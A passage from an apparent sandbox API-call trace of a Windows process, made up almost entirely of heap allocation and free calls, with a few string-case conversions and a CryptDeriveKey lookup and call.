lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0255.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0255.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0255.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.125] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.125] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.125] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.126] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.126] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.126] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.127] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0255.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0255.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.127] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.127] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0255.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0255.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.128] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.128] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0255.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9de0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0255.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.132] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0255.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0255.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0255.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0255.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.132] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0255.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0255.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0255.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0255.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0255.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | 